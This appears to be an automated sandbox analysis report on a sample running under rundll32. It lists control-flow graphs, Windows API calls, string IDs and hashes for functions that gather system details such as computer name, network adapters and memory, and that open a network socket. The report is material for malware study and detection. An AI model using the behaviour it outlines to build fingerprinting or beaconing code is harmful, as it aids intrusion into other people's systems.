7f3573a0 call 7f3492e0 call 7f3345e0 call 7f334770 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349250 2560->2596 2597 7f37670c-7f376ac5 call 7f3467d0 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f3b0dd0 call 7f349d60 GetPEB call 7f33d0c0 Sleep 2560->2597 2561->2560 2596->2597 2731 7f36c571-7f36c59b GetCursor 2597->2731 2733 7f36c5b0-7f36c6fd call 7f3d0fd0 2731->2733 2734 7f36c59d-7f36c5aa GetCursorPos 2731->2734 2739 7f36c703-7f36c826 call 7f3d0fd0 2733->2739 2740 7f36cf3a-7f36dbae call 7f3d0fd0 * 2 2733->2740 2734->2733 2754 7f36cd21-7f36cd4c lstrlenW 2739->2754 2755 7f36c82c-7f36c832 2739->2755 2827 7f36dbb0-7f36dbbb 2740->2827 2828 7f36dbbd-7f36dbda 2740->2828 2754->2740 2760 7f36cd52-7f36cdd3 2754->2760 2757 7f36ca21-7f36cb39 call 7f3d0fd0 * 2 2755->2757 2758 7f36cb3e-7f36cc2c call 7f3d0fd0 call 7f3d1010 call 7f3d0fd0 2755->2758 2759 7f36c839-7f36ca1c call 7f3d0fd0 * 5 2755->2759 2757->2754 2758->2754 2759->2754 2760->2740 2827->2828 2830 7f36dbe5-7f36e3b0 call 7f397510 call 7f3d0fd0 * 4 SetLastError 2828->2830 2831 7f36dbdc-7f36dbe3 2828->2831 2852 7f36e3b2-7f36e3b9 2830->2852 2853 7f36e3bf-7f36e701 call 7f3d0fd0 2830->2853 2831->2830 2852->2853 2859 7f36e708 2853->2859 2859->2859
                      APIs
                        • Part of subcall function 7F386350: std::exception::exception.LIBCMTD ref: 7F386380
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      • Sleep.KERNEL32(?), ref: 7F376ABF
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor$Sleepstd::exception::exception
                      • String ID: 4A$?$Exceptionencounter$P$c${
                      • API String ID: 987161800-2381072980
                      • Opcode ID: 582941671dfaf9f8ff7953d9d8d634674c5ac7ffd58d9a329cf0d82ee7b9464d
                      • Instruction ID: d4d9613752f6a9729975415a5e6049b8a90ae835f6621270d7666870ae6802f0
                      • Opcode Fuzzy Hash: 582941671dfaf9f8ff7953d9d8d634674c5ac7ffd58d9a329cf0d82ee7b9464d
                      • Instruction Fuzzy Hash: 474398B6D04368DBDB14DB69CD417EEBBB5AB89300F1481CDE049A7241EB345B94CFA2
                      Function 7F3AFA00 Relevance: 16.4, APIs: 2, Strings: 7, Instructions: 635COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2860 7f3afa00-7f3afa29 call 7f34dfb0 2863 7f3afa34-7f3afa38 2860->2863 2864 7f3afa3a-7f3afa7c 2863->2864 2865 7f3afa7e-7f3afacc call 7f341d60 2863->2865 2864->2863 2870 7f3afad8-7f3afb86 2865->2870 2871 7f3aface-7f3afad3 2865->2871 2872 7f3afb91-7f3afb95 2870->2872 2873 7f3b04a1-7f3b04a6 2871->2873 2874 7f3afbdc-7f3afcee call 7f341fa0 CoInitializeSecurity 2872->2874 2875 7f3afb97-7f3afbda 2872->2875 2879 7f3afcf9-7f3afcfd 2874->2879 2875->2872 2880 7f3afcff-7f3afd42 2879->2880 2881 7f3afd44-7f3afda1 call 7f341f70 2879->2881 2880->2879 2886 7f3aff02-7f3affad 2881->2886 2887 7f3afda7-7f3afe64 2881->2887 2888 7f3affb8-7f3affbc 2886->2888 2889 7f3afe6f-7f3afe73 2887->2889 2892 7f3affbe-7f3b0001 2888->2892 2893 7f3b0003-7f3b0065 2888->2893 2890 7f3afeba-7f3afefd call 7f341f40 2889->2890 2891 7f3afe75-7f3afeb8 2889->2891 2890->2873 2891->2889 2892->2888 2899 7f3b006b-7f3b010b 2893->2899 2900 7f3b01a9-7f3b0266 2893->2900 2906 7f3b0116-7f3b011a 2899->2906 2902 7f3b0271-7f3b0275 2900->2902 2904 7f3b02bc-7f3b031b call 7f341cd0 CoSetProxyBlanket 2902->2904 2905 7f3b0277-7f3b02ba 2902->2905 2912 7f3b049f 2904->2912 2913 7f3b0321-7f3b0404 2904->2913 2905->2902 2909 7f3b011c-7f3b015f 2906->2909 2910 7f3b0161-7f3b01a4 call 7f341f40 2906->2910 2909->2906 2910->2873 2912->2873 2920 7f3b040f-7f3b0413 2913->2920 2921 7f3b045a-7f3b049d call 7f341f40 2920->2921 2922 7f3b0415-7f3b0458 2920->2922 2921->2873 2922->2920
                      APIs
                      • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7F3AFC2A
                      • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7F3B030D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: BlanketInitializeProxySecurity
                      • String ID: =$A$S$X$b$u$z
                      • API String ID: 257369873-1612869701
                      • Opcode ID: 225c5bd8ed1cac12fdccd37c5aa6e96d2f6fc2790fe547a011821a89b59f4854
                      • Instruction ID: 27f6e49fef97592826c0b0d0b80d4ec64edc835f9a7437a9184fa19351ca809a
                      • Opcode Fuzzy Hash: 225c5bd8ed1cac12fdccd37c5aa6e96d2f6fc2790fe547a011821a89b59f4854
                      • Instruction Fuzzy Hash: 75622434A04269CBDB25CFA4C850BEEB7B2FF98300F1081A9D50DAB3A4E7755A85CF55
                      Function 7F3B4560 Relevance: 15.1, APIs: 6, Strings: 1, Instructions: 2845networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 7F333DC0: std::ios_base::clear.LIBCPMTD ref: 7F33422A
                      • socket.WS2_32(?,?,?), ref: 7F3B5493
                      • gethostbyname.WS2_32(?), ref: 7F3B582F
                      • connect.WS2_32(?,?,?), ref: 7F3B6425
                      • send.WS2_32(?,?,?,?), ref: 7F3B6819
                      • recv.WS2_32(?,?,?,?), ref: 7F3B6C72
                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7F3B7B6B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
                      • String ID: -P
                      • API String ID: 3660264722-3391753047
                      • Opcode ID: 426aebc8b311d45f84f956b7d90bb0dae1576da617114d3b3e1eee0a4ba91b2a
                      • Instruction ID: c782142a02912801d0aafe68ec995dbf015a26eeb4165c2436c97f4cbd7bcbed
                      • Opcode Fuzzy Hash: 426aebc8b311d45f84f956b7d90bb0dae1576da617114d3b3e1eee0a4ba91b2a
                      • Instruction Fuzzy Hash: FD73ACB4E052698FDB65CF18C990BE9BBB1AF89304F1081DAD84DA7355DB34AE81CF50
                      Function 7F36A8E8 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 674COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3526 7f36a8e8-7f36a906 3527 7f36a91c-7f36a91f 3526->3527 3528 7f36a908-7f36a91a 3526->3528 3529 7f36a927-7f36acc6 call 7f3d0fd0 * 2 call 7f3b28c0 call 7f347680 call 7f348480 call 7f3463a0 * 4 call 7f3ac670 call 7f3463a0 * 2 call 7f396330 3527->3529 3528->3529 3561 7f36accb-7f36acd4 3529->3561 3562 7f36acd8-7f36ad04 3561->3562 3564 7f36ad06-7f36ad12 3562->3564 3565 7f36ad14-7f36b57b call 7f3d0fd0 * 5 3562->3565 3564->3565 3589 7f36c3b3-7f36c3c0 3565->3589 3590 7f36b581-7f36be06 GetActiveWindow call 7f3d1150 call 7f3d0fd0 3565->3590 3591 7f36c3c6-7f36c453 3589->3591 3592 7f36c571-7f36c59b GetCursor 3589->3592 3590->3589 3696 7f36be0c-7f36be18 3590->3696 3591->3592 3597 7f36c5b0-7f36c6fd call 7f3d0fd0 3592->3597 3598 7f36c59d-7f36c5aa GetCursorPos 3592->3598 3615 7f36c703-7f36c826 call 7f3d0fd0 3597->3615 3616 7f36cf3a-7f36dbae call 7f3d0fd0 * 2 3597->3616 3598->3597 3637 7f36cd21-7f36cd4c lstrlenW 3615->3637 3638 7f36c82c-7f36c832 3615->3638 3743 7f36dbb0-7f36dbbb 3616->3743 3744 7f36dbbd-7f36dbda 3616->3744 3637->3616 3645 7f36cd52-7f36cdd3 3637->3645 3641 7f36ca21-7f36cb39 call 7f3d0fd0 * 2 3638->3641 3642 7f36cb3e-7f36cc2c call 7f3d0fd0 call 7f3d1010 call 7f3d0fd0 3638->3642 3643 7f36c839-7f36ca1c call 7f3d0fd0 * 5 3638->3643 3641->3637 3642->3637 3643->3637 3645->3616 3696->3589 3699 7f36be1e-7f36be7e call 7f39afc0 3696->3699 3717 7f36be92-7f36be99 3699->3717 3718 7f36be80-7f36be8c 3699->3718 3719 7f36bea1-7f36c279 3717->3719 3720 7f36be9b-7f36be9f 3717->3720 3718->3717 3719->3562 3720->3719 3743->3744 3746 7f36dbe5-7f36e3b0 call 7f397510 call 7f3d0fd0 * 4 SetLastError 3744->3746 3747 7f36dbdc-7f36dbe3 3744->3747 3768 7f36e3b2-7f36e3b9 3746->3768 3769 7f36e3bf-7f36e701 call 7f3d0fd0 3746->3769 3747->3746 3768->3769 3775 7f36e708 3769->3775 3775->3775
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$-:$P
                      • API String ID: 0-2366852182
                      • Opcode ID: d9b2cb6ed99a745317f4f085fed1347606ea195f739c2eef923ee7fb954aabed
                      • Instruction ID: 53bd34b8c9770c0d402eebf2f4ba096e91a49533d7becca892473ef1904e251b
                      • Opcode Fuzzy Hash: d9b2cb6ed99a745317f4f085fed1347606ea195f739c2eef923ee7fb954aabed
                      • Instruction Fuzzy Hash: DC62BE79D04268CBDB14CF6AC8907ADBFF6FB48315F28819ED449A7249D7349A90CF60
                      Function 7F3AE390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3776 7f3ae390-7f3ae3d4 GetPEB 3777 7f3ae3d7-7f3ae420 3776->3777 3778 7f3ae42b 3777->3778 3779 7f3ae422-7f3ae429 3777->3779 3780 7f3ae432-7f3ae43e 3778->3780 3779->3780 3781 7f3ae500-7f3ae51e 3780->3781 3782 7f3ae444-7f3ae44a 3780->3782 3781->3777 3783 7f3ae524 3781->3783 3784 7f3ae44d-7f3ae460 3782->3784 3785 7f3ae52b-7f3ae568 GlobalMemoryStatusEx call 7f3d1060 * 2 3783->3785 3784->3781 3786 7f3ae466-7f3ae481 3784->3786 3788 7f3ae488-7f3ae49f 3786->3788 3790 7f3ae4a9-7f3ae4ba 3788->3790 3791 7f3ae4a1-7f3ae4c3 3788->3791 3790->3788 3795 7f3ae4fb 3791->3795 3796 7f3ae4c5-7f3ae4f9 3791->3796 3795->3784 3796->3785
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$GlobalMemoryStatus
                      • String ID: @
                      • API String ID: 2185283323-2766056989
                      • Opcode ID: f1058deb4e9371ed4da84e2f728fe60e268b50bef84b7ef11c0971e1d6617e30
                      • Instruction ID: d603ad2a77c3fb06f6d701f457b5054f0f8818baecd925c1a4fd6a5d2feed157
                      • Opcode Fuzzy Hash: f1058deb4e9371ed4da84e2f728fe60e268b50bef84b7ef11c0971e1d6617e30
                      • Instruction Fuzzy Hash: A071BFB8E042599FCB04CF99C490AAEFBB1FF48304F108299E915AB345D735AA81CF55
                      Function 7F3A9EF0 Relevance: 6.8, Strings: 5, Instructions: 533COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 3797 7f3a9ef0-7f3a9f10 call 7f3afa00 3800 7f3a9f7f-7f3a9fa9 call 7f34e120 3797->3800 3801 7f3a9f12-7f3a9f1f 3797->3801 3807 7f3a9fb4-7f3a9fb8 3800->3807 3802 7f3a9f25-7f3a9f35 3801->3802 3802->3802 3804 7f3a9f37-7f3a9f75 call 7f37caa0 3802->3804 3811 7f3aa72a-7f3aa72f 3804->3811 3809 7f3a9fba-7f3a9ffc 3807->3809 3810 7f3a9ffe-7f3aa06e 3807->3810 3809->3807 3813 7f3aa079-7f3aa07d 3810->3813 3814 7f3aa0bb-7f3aa115 3813->3814 3815 7f3aa07f-7f3aa0b9 3813->3815 3818 7f3aa2fb-7f3aa30d 3814->3818 3819 7f3aa11b-7f3aa1ff 3814->3819 3815->3813 3820 7f3aa313-7f3aa337 3818->3820 3821 7f3aa5a4-7f3aa5c1 3818->3821 3830 7f3aa20a-7f3aa20e 3819->3830 3826 7f3aa339-7f3aa346 3820->3826 3827 7f3aa3a1-7f3aa40a call 7f341d30 3820->3827 3829 7f3aa5c6-7f3aa696 3821->3829 3831 7f3aa34c-7f3aa35c 3826->3831 3844 7f3aa415-7f3aa419 3827->3844 3841 7f3aa6a1-7f3aa6a5 3829->3841 3833 7f3aa210-7f3aa253 3830->3833 3834 7f3aa255-7f3aa2a0 call 7f341f40 3830->3834 3831->3831 3835 7f3aa35e-7f3aa39c call 7f37caa0 3831->3835 3833->3830 3852 7f3aa2a6-7f3aa2b6 3834->3852 3835->3821 3845 7f3aa6ec-7f3aa725 call 7f341f40 3841->3845 3846 7f3aa6a7-7f3aa6ea 3841->3846 3848 7f3aa41b-7f3aa45e 3844->3848 3849 7f3aa460-7f3aa4a8 3844->3849 3845->3811 3846->3841 3848->3844 3856 7f3aa4ad-7f3aa519 call 7f341eb0 call 7f37bc30 call 7f341dc0 call 7f3cee60 3849->3856 3852->3852 3855 7f3aa2b8-7f3aa2f6 call 7f37caa0 3852->3855 3855->3811 3869 7f3aa51f-7f3aa52f 3856->3869 3869->3869 3870 7f3aa531-7f3aa59d call 7f37caa0 call 7f37c230 call 7f341fd0 3869->3870 3870->3821
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: &$'$=$N/A$\
                      • API String ID: 0-1891767656
                      • Opcode ID: ca766ed53767808d2822ac657a1de846e492765e848ecad22cf152df390136f1
                      • Instruction ID: bfa29631605c47ab2da40d6c0b9566ca645f60a5a4b9b705ee167b8d6897d2af
                      • Opcode Fuzzy Hash: ca766ed53767808d2822ac657a1de846e492765e848ecad22cf152df390136f1
                      • Instruction Fuzzy Hash: 67420474E04218CBDB15CFA9C890BEEB7B2FF98300F1081A9E509AB354EB755A85CF55
                      Function 7F3AE860 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5230 7f3ae860-7f3ae8bd GetPEB 5231 7f3ae8c0-7f3ae915 5230->5231 5232 7f3ae920 5231->5232 5233 7f3ae917-7f3ae91e 5231->5233 5234 7f3ae927-7f3ae933 5232->5234 5233->5234 5235 7f3ae939-7f3ae93f 5234->5235 5236 7f3ae9f5-7f3aea13 5234->5236 5238 7f3ae942-7f3ae955 5235->5238 5236->5231 5237 7f3aea19 5236->5237 5239 7f3aea20-7f3aea38 GetComputerNameExA 5237->5239 5238->5236 5240 7f3ae95b-7f3ae976 5238->5240 5241 7f3aea3a-7f3aea47 5239->5241 5242 7f3aeaa5-7f3aeabd call 7f341f10 5239->5242 5243 7f3ae97d-7f3ae994 5240->5243 5244 7f3aea4d-7f3aea5d 5241->5244 5257 7f3aeabf-7f3aeacc 5242->5257 5258 7f3aeb27-7f3aeb36 5242->5258 5246 7f3ae99e-7f3ae9af 5243->5246 5247 7f3ae996-7f3ae9b8 5243->5247 5244->5244 5248 7f3aea5f-7f3aeaa0 call 7f37caa0 5244->5248 5246->5243 5252 7f3ae9ba-7f3ae9ee 5247->5252 5253 7f3ae9f0 5247->5253 5256 7f3aeb91-7f3aeb94 5248->5256 5252->5239 5253->5238 5260 7f3aead2-7f3aeae2 5257->5260 5259 7f3aeb3c-7f3aeb4c 5258->5259 5259->5259 5262 7f3aeb4e-7f3aeb8c call 7f37caa0 5259->5262 5260->5260 5261 7f3aeae4-7f3aeb25 call 7f37caa0 5260->5261 5261->5256 5262->5256
                      APIs
                      • GetComputerNameExA.KERNEL32(?,?,?), ref: 7F3AEA33
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ComputerName
                      • String ID: WORKGROUP
                      • API String ID: 3545744682-2380569353
                      • Opcode ID: 13ab42e3733de6260c869bbf811c2ca199380bc36d976ab155ad0de14533ffc0
                      • Instruction ID: d73cd0fff267bd7c5ad1e438c6681252ef2c7209f8ecefe54a8136bfa084944d
                      • Opcode Fuzzy Hash: 13ab42e3733de6260c869bbf811c2ca199380bc36d976ab155ad0de14533ffc0
                      • Instruction Fuzzy Hash: 64B1DE74E04258DFDB58CFA9C890B9DBBB2FF48304F208299D849A7345D735AA85CF51
                      Function 7F3B0DD0 Relevance: 2.8, Strings: 1, Instructions: 1512COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5266 7f3b0dd0-7f3b0eaa call 7f333000 call 7f37b9f0 call 7f351590 call 7f385320 call 7f350230 call 7f384fa0 call 7f3529a0 call 7f3852e0 5283 7f3b0eac-7f3b0ebb 5266->5283 5284 7f3b0f13-7f3b0f19 5266->5284 5285 7f3b0ec1-7f3b0ed1 5283->5285 5286 7f3b0f1b-7f3b0f2a 5284->5286 5287 7f3b0f82-7f3b1012 call 7f333170 call 7f3463a0 call 7f333000 5284->5287 5285->5285 5288 7f3b0ed3-7f3b0f0e call 7f37caa0 5285->5288 5289 7f3b0f30-7f3b0f40 5286->5289 5299 7f3b1018-7f3b1028 5287->5299 5288->5284 5289->5289 5292 7f3b0f42-7f3b0f7d call 7f37caa0 5289->5292 5292->5287 5299->5299 5300 7f3b102a-7f3b1be1 call 7f335370 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 call 7f333170 call 7f3463a0 call 7f3345e0 call 7f33d200 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 call 7f333170 call 7f3463a0 call 7f3345e0 call 7f33d200 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 call 7f333170 call 7f3463a0 call 7f3345e0 call 7f33d200 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 call 7f333170 call 7f3463a0 call 7f3345e0 call 7f33d200 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 call 7f333170 call 7f3463a0 call 7f346480 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 call 7f333170 call 7f3463a0 call 7f346480 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f345f50 * 2 call 7f3d0b46 * 2 call 7f37b900 call 7f3d0b46 call 7f37b900 call 7f3d0b46 call 7f37b900 call 7f3d0b46 call 7f37b900 call 7f3d0b46 call 7f37b900 call 7f3d0b46 call 7f37b900 call 7f3d0b46 call 7f37b900 call 7f392690 call 7f37aea0 call 7f394b90 call 7f333000 5299->5300 5457 7f3b1be7-7f3b1bf7 5300->5457 5457->5457 5458 7f3b1bf9-7f3b1d0b call 7f335370 call 7f37b900 call 7f3348e0 call 7f349e20 call 7f37b900 call 7f3463a0 * 3 call 7f3b4560 5457->5458 5477 7f3b1d0d-7f3b1d5a call 7f351dc0 call 7f384da0 call 7f37aea0 call 7f341d00 5458->5477 5478 7f3b1d60-7f3b1ddf call 7f3463a0 * 2 call 7f333000 5458->5478 5477->5478 5498 7f3b26a1-7f3b2787 call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 2 call 7f37ca10 call 7f386350 call 7f37b900 * 3 call 7f37ca10 call 7f386350 call 7f37b900 * 2 5477->5498 5491 7f3b1de5-7f3b1df5 5478->5491 5491->5491 5493 7f3b1df7-7f3b1e6b call 7f335370 call 7f3b4560 5491->5493 5503 7f3b1e6d-7f3b1eba call 7f34ca00 call 7f384ee0 call 7f37aea0 call 7f341d00 5493->5503 5504 7f3b1ec0-7f3b1f3e call 7f3463a0 * 2 call 7f333000 5493->5504 5598 7f3b278a-7f3b2797 5498->5598 5503->5504 5535 7f3b25a4-7f3b269c call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 3 call 7f37ca10 call 7f386350 call 7f37b900 * 3 call 7f37ca10 call 7f386350 call 7f37b900 * 2 5503->5535 5523 7f3b1f44-7f3b1f54 5504->5523 5523->5523 5526 7f3b1f56-7f3b1fca call 7f335370 call 7f3b4560 5523->5526 5541 7f3b201f-7f3b209e call 7f3463a0 * 2 call 7f333000 5526->5541 5542 7f3b1fcc-7f3b2019 call 7f351660 call 7f384f60 call 7f37aea0 call 7f341d00 5526->5542 5535->5598 5570 7f3b20a4-7f3b20b4 5541->5570 5542->5541 5583 7f3b2498-7f3b259f call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 4 call 7f37ca10 call 7f386350 call 7f37b900 * 3 call 7f37ca10 call 7f386350 call 7f37b900 * 2 5542->5583 5570->5570 5574 7f3b20b6-7f3b212a call 7f335370 call 7f3b4560 5570->5574 5594 7f3b217f-7f3b21c6 GetPEB 5574->5594 5595 7f3b212c-7f3b2179 call 7f350980 call 7f384f20 call 7f37aea0 call 7f341d00 5574->5595 5583->5598 5597 7f3b21c9-7f3b2224 5594->5597 5595->5594 5634 7f3b237d-7f3b2493 call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 5 call 7f37ca10 call 7f386350 call 7f37b900 * 3 call 7f37ca10 call 7f386350 call 7f37b900 * 2 5595->5634 5604 7f3b2232 5597->5604 5605 7f3b2226-7f3b2230 5597->5605 5609 7f3b223c-7f3b224b 5604->5609 5605->5609 5613 7f3b2251-7f3b2257 5609->5613 5614 7f3b2334-7f3b235e 5609->5614 5619 7f3b225a-7f3b2273 5613->5619 5614->5597 5618 7f3b2364 5614->5618 5624 7f3b236e-7f3b2376 5618->5624 5619->5614 5620 7f3b2279-7f3b229a 5619->5620 5625 7f3b22a1-7f3b22b8 5620->5625 5624->5634 5629 7f3b22ba-7f3b22e2 5625->5629 5630 7f3b22c5-7f3b22d6 5625->5630 5639 7f3b232f 5629->5639 5640 7f3b22e4-7f3b232d 5629->5640 5630->5625 5634->5598 5639->5619 5640->5624
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: std::exception::exception
                      • String ID: L
                      • API String ID: 2807920213-2909332022
                      • Opcode ID: 882c671d75ed24ca2c0f1dae7ca39d9109bb1e28c62f43b4d6d05dc1a20b3180
                      • Instruction ID: 7bfb8caaa26903f2db507557bdf0b56c21df48711f84d2652aeda166b110dd37
                      • Opcode Fuzzy Hash: 882c671d75ed24ca2c0f1dae7ca39d9109bb1e28c62f43b4d6d05dc1a20b3180
                      • Instruction Fuzzy Hash: 97032FB0D0126CCBDB65DB68CC94BEEBBB4AF59304F1081D9D409A7281DB346B85CFA1
                      Function 7F3AB430 Relevance: 2.4, APIs: 1, Instructions: 863COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5702 7f3ab430-7f3ab4ab call 7f3d1170 GetPEB 5705 7f3ab4b1-7f3ab50f 5702->5705 5706 7f3ab51d 5705->5706 5707 7f3ab511-7f3ab51b 5705->5707 5708 7f3ab527-7f3ab536 5706->5708 5707->5708 5709 7f3ab53c-7f3ab542 5708->5709 5710 7f3ab637-7f3ab667 5708->5710 5711 7f3ab545-7f3ab55e 5709->5711 5710->5705 5712 7f3ab66d 5710->5712 5711->5710 5713 7f3ab564-7f3ab588 5711->5713 5714 7f3ab677-7f3ab69a GetAdaptersInfo 5712->5714 5717 7f3ab592-7f3ab5b2 5713->5717 5715 7f3aba2e-7f3abab7 call 7f353660 call 7f3856a0 GetPEB 5714->5715 5716 7f3ab6a0-7f3ab7a1 call 7f352420 call 7f3859e0 GetPEB 5714->5716 5731 7f3ababd-7f3abb1b 5715->5731 5732 7f3ab7a7-7f3ab805 5716->5732 5719 7f3ab5c2-7f3ab5d9 5717->5719 5720 7f3ab5b4-7f3ab5e5 5717->5720 5719->5717 5726 7f3ab632 5720->5726 5727 7f3ab5e7-7f3ab630 5720->5727 5726->5711 5727->5714 5733 7f3abb29 5731->5733 5734 7f3abb1d-7f3abb27 5731->5734 5735 7f3ab813 5732->5735 5736 7f3ab807-7f3ab811 5732->5736 5737 7f3abb33-7f3abb42 5733->5737 5734->5737 5738 7f3ab81d-7f3ab82c 5735->5738 5736->5738 5739 7f3abb48-7f3abb4e 5737->5739 5740 7f3abc43-7f3abc73 5737->5740 5741 7f3ab92d-7f3ab95d 5738->5741 5742 7f3ab832-7f3ab838 5738->5742 5744 7f3abb51-7f3abb6a 5739->5744 5740->5731 5746 7f3abc79 5740->5746 5741->5732 5743 7f3ab963 5741->5743 5745 7f3ab83b-7f3ab854 5742->5745 5747 7f3ab96d-7f3ab9d1 5743->5747 5744->5740 5748 7f3abb70-7f3abb94 5744->5748 5745->5741 5749 7f3ab85a-7f3ab87e 5745->5749 5750 7f3abc83-7f3abd2a call 7f350c10 call 7f3857a0 GetPEB 5746->5750 5760 7f3ab9d7-7f3ab9e7 5747->5760 5751 7f3abb9e-7f3abbbe 5748->5751 5752 7f3ab888-7f3ab8a8 5749->5752 5773 7f3abd30-7f3abd9a 5750->5773 5755 7f3abbce-7f3abbe5 5751->5755 5756 7f3abbc0-7f3abbf1 5751->5756 5757 7f3ab8aa-7f3ab8db 5752->5757 5758 7f3ab8b8-7f3ab8cf 5752->5758 5755->5751 5767 7f3abc3e 5756->5767 5768 7f3abbf3-7f3abc3c 5756->5768 5763 7f3ab928 5757->5763 5764 7f3ab8dd-7f3ab926 5757->5764 5758->5752 5760->5760 5766 7f3ab9e9-7f3aba29 call 7f37caa0 5760->5766 5763->5745 5764->5747 5774 7f3ac32d-7f3ac330 5766->5774 5767->5744 5768->5750 5775 7f3abda8 5773->5775 5776 7f3abd9c-7f3abda6 5773->5776 5777 7f3abdb2-7f3abdc1 5775->5777 5776->5777 5778 7f3abedd-7f3abf0d 5777->5778 5779 7f3abdc7-7f3abdd0 5777->5779 5778->5773 5780 7f3abf13 5778->5780 5781 7f3abdd3-7f3abdec 5779->5781 5782 7f3abf1d-7f3abfc5 call 7f34fa30 call 7f3859a0 GetPEB 5780->5782 5781->5778 5783 7f3abdf2-7f3abe1f 5781->5783 5795 7f3abfcb-7f3ac029 5782->5795 5784 7f3abe29-7f3abe49 5783->5784 5786 7f3abe4b-7f3abe7c 5784->5786 5787 7f3abe59-7f3abe70 5784->5787 5790 7f3abed8 5786->5790 5791 7f3abe7e-7f3abed6 5786->5791 5787->5784 5790->5781 5791->5782 5796 7f3ac02b-7f3ac035 5795->5796 5797 7f3ac037 5795->5797 5798 7f3ac041-7f3ac050 5796->5798 5797->5798 5799 7f3ac151-7f3ac181 5798->5799 5800 7f3ac056-7f3ac05c 5798->5800 5799->5795 5802 7f3ac187 5799->5802 5801 7f3ac05f-7f3ac078 5800->5801 5801->5799 5803 7f3ac07e-7f3ac0a2 5801->5803 5804 7f3ac191-7f3ac2d5 call 7f341e80 call 7f34e260 call 7f385060 call 7f341c40 * 2 call 7f3517f0 call 7f3850e0 call 7f341c40 * 2 call 7f34b340 call 7f384fe0 call 7f341c40 call 7f3cee60 5802->5804 5805 7f3ac0ac-7f3ac0cc 5803->5805 5844 7f3ac2db-7f3ac2eb 5804->5844 5806 7f3ac0ce-7f3ac0ff 5805->5806 5807 7f3ac0dc-7f3ac0f3 5805->5807 5811 7f3ac14c 5806->5811 5812 7f3ac101-7f3ac14a 